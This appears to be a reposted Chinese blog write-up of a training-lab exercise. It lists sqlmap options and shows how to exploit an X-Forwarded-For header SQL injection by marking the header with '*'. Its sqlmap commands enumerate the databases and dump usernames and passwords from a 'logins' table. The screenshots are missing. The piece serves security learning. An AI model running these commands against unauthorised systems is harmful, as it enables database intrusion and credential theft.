sqlmap使用和X-Forwarded-For注入漏洞测试

sqlmap的参数:

sqlmap -r 1.txt --batch -D webcalendar -T logins -C "loginip,logintime,username,password,status" --dump http://219.153.49.228:43259

  • -r **.txt 从一个文件中载入HTTP请求。
  • --batch 从不询问用户输入,使用所有默认配置。
  • -D 库名 要进行枚举的指定数据库名
  • -T 表名 要进行枚举的指定数据库表(如:-T tablename –columns)
  • -C 列名 要进行枚举的数据库列
  • --dump 转储数据库管理系统的数据库中的表项
  • --dbs  枚举数据库管理系统数据库
  • --current-db 检索网站当前数据库
  • --users 检索所有数据库用户
  • --current-user 检索当前数据库用户

sqlmap成功后会在该目录下生成ip命名的文件夹 root@kali:~/.sqlmap/output/ip

X-Forwarded-For也称作XFF,是在http头中的一个参数

1、任务介绍

 

 2、漏洞页面

 

3、提交任意信息看看结果,提示ip已记录,证明此处与数据库有交互

  

4、添加XFF参数,提交任意数据看看:

 可正常提交,存在XFF注入漏洞:

 用1.1.1.1的ip构造http文件,使用sqlmap -r 1.txt --dbs --batch http://219.153.49.228:45804,跑不出来库,后来用的*号才可以

 用1.1.1.1跑不出来

 

 换*号后,跑出两个数据库和payload:

用sqlmap -r 11.txt -D webcalendar --tables --batch http://219.153.49.228:45804跑出表名

 

 继续跑字段和内容:

用户名和口令已出来:

 

 登录后获取flag

参考:

Sqlmap使用教程【个人笔记精华整理】_数据库_TT小子的博客-CSDN博客(参数介绍很详细全面!!)

猜你喜欢

转载自www.cnblogs.com/jasy/p/12600666.html
今日推荐